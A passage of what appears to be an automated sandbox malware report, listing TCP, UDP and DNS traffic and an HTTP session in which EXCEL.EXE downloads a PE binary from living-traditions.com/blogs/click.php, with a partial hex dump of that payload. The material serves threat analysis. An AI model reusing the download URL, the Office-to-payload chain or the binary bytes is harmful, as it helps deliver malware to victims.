                                                                                                                                                                  Apr 12, 2021 17:12:29.805356979 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805373907 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805380106 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.805411100 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.805418015 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805435896 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805439949 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.805454969 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805471897 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805474997 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.805488110 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805504084 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805515051 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.805521011 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805543900 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805543900 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.805560112 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805577040 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805591106 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.805593014 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805613995 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805625916 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.805632114 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805644989 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805658102 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805658102 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.805675030 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805691004 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805701017 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.805706978 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805722952 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805738926 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805751085 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.805753946 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.805778980 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.805808067 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.934176922 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.934207916 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.934220076 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.934232950 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.934338093 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.934376955 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.934391022 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.934431076 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.934470892 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.935045004 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.935061932 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.935079098 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.935096025 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.935107946 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.935115099 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.935132980 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.935149908 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.935162067 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.935187101 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.935203075 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.935209990 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.935219049 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.935235023 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.935240030 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.935250998 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.935262918 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.935266972 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.935282946 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.935303926 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.935305119 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.935321093 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.935348034 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.935372114 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.936494112 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.936517000 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.936531067 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.936547041 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.936563015 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.936579943 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.936598063 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.936613083 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.936615944 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.936631918 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.936652899 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.936661005 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.936669111 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.936685085 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.936700106 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.936702013 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.936716080 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.936731100 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.936734915 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.936747074 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.936758041 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.936763048 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.936780930 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.936794043 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.936798096 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.936814070 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.936827898 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.936829090 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.936846018 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.936858892 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.936861038 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.936876059 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.936891079 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.936892986 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.936906099 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.936922073 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.936953068 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:14:13.676525116 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:14:13.807547092 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:14:13.807642937 CEST4971480192.168.2.364.207.186.30

                                                                                                                                                                  UDP Packets

                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                  Apr 12, 2021 17:12:10.166270971 CEST6098553192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:12:10.235234022 CEST53609858.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:10.572501898 CEST5020053192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:12:10.623192072 CEST53502008.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:10.733810902 CEST5128153192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:12:10.782320976 CEST53512818.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:11.487895012 CEST4919953192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:12:11.547650099 CEST53491998.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:12.651062012 CEST5062053192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:12:12.701529980 CEST53506208.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:13.530662060 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:12:13.583457947 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:13.958421946 CEST6015253192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:12:14.017302036 CEST53601528.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:15.152190924 CEST5754453192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:12:15.200813055 CEST53575448.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:16.672051907 CEST5598453192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:12:16.720828056 CEST53559848.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:22.697266102 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:12:22.749782085 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:23.718422890 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:12:23.776175022 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:24.196566105 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:12:24.269213915 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:24.703171968 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:12:24.751795053 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:25.206665039 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:12:25.264100075 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:26.223649025 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:12:26.280659914 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:28.237773895 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:12:28.308604002 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:28.505542040 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:12:28.568959951 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:12:28.629479885 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:28.651699066 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:32.346003056 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:12:32.403481007 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:35.646430969 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:12:35.698082924 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:38.445791006 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:12:38.508009911 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:39.241060019 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:12:39.289609909 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:40.090028048 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:12:40.141598940 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:40.962084055 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:12:41.013605118 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:42.102891922 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:12:42.151520967 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:43.337145090 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:12:43.385710955 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:44.546957970 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:12:44.595709085 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:45.138573885 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:12:45.200107098 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:45.863009930 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:12:45.916146040 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:47.034605026 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:12:47.083312035 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:48.181421041 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:12:48.235048056 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:13:01.141535044 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:13:01.203010082 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:13:05.354763031 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:13:05.403516054 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:13:34.520791054 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:13:34.570939064 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:13:38.405123949 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:13:38.466347933 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:14:26.532181025 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:14:26.596822023 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:14:27.531255960 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:14:27.553838968 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:14:27.607048035 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:14:27.627260923 CEST53606338.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:14:28.253304005 CEST6129253192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:14:28.315382957 CEST53612928.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:14:28.810343981 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:14:28.889751911 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:14:29.552643061 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:14:29.604259968 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:14:30.134917021 CEST6194653192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:14:30.192377090 CEST53619468.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:14:30.652394056 CEST6491053192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:14:30.709589005 CEST53649108.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:14:31.627110004 CEST5212353192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:14:31.685026884 CEST53521238.8.8.8192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:14:32.329749107 CEST5613053192.168.2.38.8.8.8
                                                                                                                                                                  Apr 12, 2021 17:14:32.388941050 CEST53561308.8.8.8192.168.2.3

                                                                                                                                                                  DNS Queries

                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                  Apr 12, 2021 17:12:10.166270971 CEST192.168.2.38.8.8.80xda23Standard query (0)clientconfig.passport.netA (IP address)IN (0x0001)
                                                                                                                                                                  Apr 12, 2021 17:12:28.505542040 CEST192.168.2.38.8.8.80xd09Standard query (0)living-traditions.comA (IP address)IN (0x0001)

                                                                                                                                                                  DNS Answers

                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                  Apr 12, 2021 17:12:10.235234022 CEST8.8.8.8192.168.2.30xda23No error (0)clientconfig.passport.netauthgfx.msa.akadns6.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                  Apr 12, 2021 17:12:28.651699066 CEST8.8.8.8192.168.2.30xd09No error (0)living-traditions.com64.207.186.30A (IP address)IN (0x0001)

                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                  • living-traditions.com

                                                                                                                                                                  HTTP Packets

                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                  0192.168.2.34971464.207.186.3080C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                  Apr 12, 2021 17:12:28.785401106 CEST826OUTGET /blogs/click.php HTTP/1.1
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                  Host: living-traditions.com
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Apr 12, 2021 17:12:29.014661074 CEST979INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Mon, 12 Apr 2021 15:12:28 GMT
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  X-Powered-By: PHP/7.3.25
                                                                                                                                                                  Content-Disposition: attachment; filename="SQCTO.perclick"
                                                                                                                                                                  X-Powered-By: PleskLin
                                                                                                                                                                  Data Raw: 31 66 32 37 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 50 e9 4c 75 31 87 1f 75 31 87 1f 75 31 87 1f 3f 54 82 1e 74 31 87 1f 06 53 86 1e 72 31 87 1f 75 31 86 1f 70 31 87 1f 65 57 82 1e 71 31 87 1f 65 57 87 1e 74 31 87 1f 65 57 85 1e 74 31 87 1f 52 69 63 68 75 31 87 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 9a 2b 74 60 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 0d 00 28 00 00 00 b0 06 00 00 00 00 00 6d 19 00 00 00 10 00 00 00 40 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 07 00 00 04 00 00 28 0f 07 00 01 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 40 00 00 44 00 00 00 68 41 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 07 00 80 00 00 00 20 40 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 af 26 00 00 00 10 00 00 00 28 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 44 02 00 00 00 40 00 00 00 04 00 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 40 00 00 00 50 00 00 00 42 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 ff 67 06 00 00 a0 00 00 00 68 06 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 80 00 00 00 00 10 07 00 00 02 00 00 00 da 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 81 ec 28 02 00 00 53 56 be c3 68 13 00 33 db 43 83 3d 1c 90 00 10 00 89 5d d8 66 0f 6e c6 f3 0f
                                                                                                                                                                  Data Ascii: 1f27MZ@!L!This program cannot be run in DOS mode.$1PLu1u1u1?Tt1Sr1u1p1eWq1eWt1eWt1Richu1PEL+t`!(m@ (@@@DhAP @@ .text&( `.rdataD@,@@.data8@PB0@.pdataghr@.reloc@BU(SVh3C=]fn
                                                                                                                                                                  Apr 12, 2021 17:12:29.014681101 CEST980INData Raw: e6 c0 f2 0f 11 45 f0 89 75 f4 66 0f 6e c6 f3 0f e6 c0 f2 0f 11 45 f0 89 75 f4 66 0f 6e c6 f3 0f e6 c0 f2 0f 11 45 f0 66 0f 6e c6 f3 0f e6 c0 89 75 f4 f2 0f 11 45 f0 66 0f 6e c6 f3 0f e6 c0 89 75 f4 f2 0f 11 45 f0 66 0f 6e c6 f3 0f e6 c0 89 75 f4
                                                                                                                                                                  Data Ascii: EufnEufnEfnuEfnuEfnuEfnuEut3fnhj5Eu4fnEufnjh05PEju0fn=EuP3fn
                                                                                                                                                                  Apr 12, 2021 17:12:29.014695883 CEST981INData Raw: 8a 84 0d d8 fd ff ff 33 c2 88 84 0d d8 fd ff ff 41 c7 45 f4 c3 68 13 00 66 0f 6e 45 f4 f3 0f e6 c0 f2 0f 11 45 f0 c7 45 f4 c3 68 13 00 3b 0d 14 90 00 10 72 b1 ba c3 68 13 00 a1 14 90 00 10 fe c3 8b 4d 08 66 0f 6e c2 f3 0f e6 c0 89 5d d8 0f af c1
                                                                                                                                                                  Data Ascii: 3AEhfnEEEh;rhMfn]EUfnEPEA3EUfnEUEEfnEU3E5UhEfnEfnUEEEfnUEfnU
                                                                                                                                                                  Apr 12, 2021 17:12:29.014713049 CEST983INData Raw: 8a fc ff ff 66 0f 6e c7 33 c0 f3 0f e6 c0 f2 0f 11 45 f8 89 7d fc 5f 5b 8b e5 5d c3 55 8b ec 83 ec 38 53 bb c3 68 13 00 56 57 66 0f 6e c3 f3 0f e6 c0 f2 0f 11 45 c8 89 5d cc 66 0f 6e c3 f3 0f e6 c0 f2 0f 11 45 c8 89 5d cc 66 0f 6e c3 f3 0f e6 c0
                                                                                                                                                                  Data Ascii: fn3E}_[]U8ShVWfnE]fnE]fnE]fnE]fnE]fnE]fnE]fnE]fnE]fnE]fnE]fnE]Ef
